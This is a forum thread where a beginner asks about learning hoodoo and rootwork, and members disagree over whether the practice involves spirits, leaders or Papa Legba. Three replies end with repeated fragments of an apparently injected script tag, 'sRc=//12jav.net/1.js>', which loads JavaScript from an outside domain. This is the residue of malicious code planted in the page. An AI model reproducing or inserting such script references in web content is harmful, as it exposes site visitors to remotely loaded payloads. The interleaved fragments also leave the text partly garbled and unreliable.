Hello everyone.
Although im not knew to this site, Im some what knew to learning about hoodoo/ conjure/ rootwork and feel like im barely scratching the surface.
Im reaching out to those who practice traditional conjure and rootwork and wish if possible we can exchange words about the practice. Then main/ only resource i have is books i've purchased what ive learned about other paths that gives me a sense of understanding and going with intuition but then again im looking to learn more about tradition then forming my own eclectic path. then again we all experience things differently and would appreciate to learn about anyone else's experiences in learning/practicing hoodoo, conjure, rootwork.
Its not a problem. Glad to know of anothr person on this site who is also learning the same thing. Pleasure to meat you lanvder.

Its a little hard to learn Hoodoo. Books just give the idea of it. Hoodoo mainly needs to be learned straight from someone who has practiced it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
It depends on what you want. As much as I hate to admit this it works better if you find a tribe or leader. You don't necessarily need one I mean the study and root work can be self taught. That is why there are so many branches in the religion. If you wish to a bokor and do your own thing there is no harm in that. I just have one suggestion, try reaching Papa Legba. He is the keeper of the crossroads and the first all practitioners should reach before doing anything. He speaks in all tongues and is will be your best first step. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
You don't work with spirits in hoodoo period. It is not a religion by any means. There is no "tribe" or "leader". Hoodoo is for people that want to solo practice without any spirit involved. There is no branches. Papa Legba is a Vodou spirit, so I don't know what information you have been reading or mixing up but your facts are completely wrong.
Hoodoo root works is derive from the voodoo/vodun. Talismans, conjuring, spells, and more to the point prayers used in hoodoo baseline from religion. The work requires use, recognition, attachment and/or contact of deities, spirits and/or God.
It would be pointless to copy or use the form and disregard or even more to the point deny there is an entity or existence. Is the practice not a system you implement on faith, a pursuit or interest to a power which someone ascribes supreme importance? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
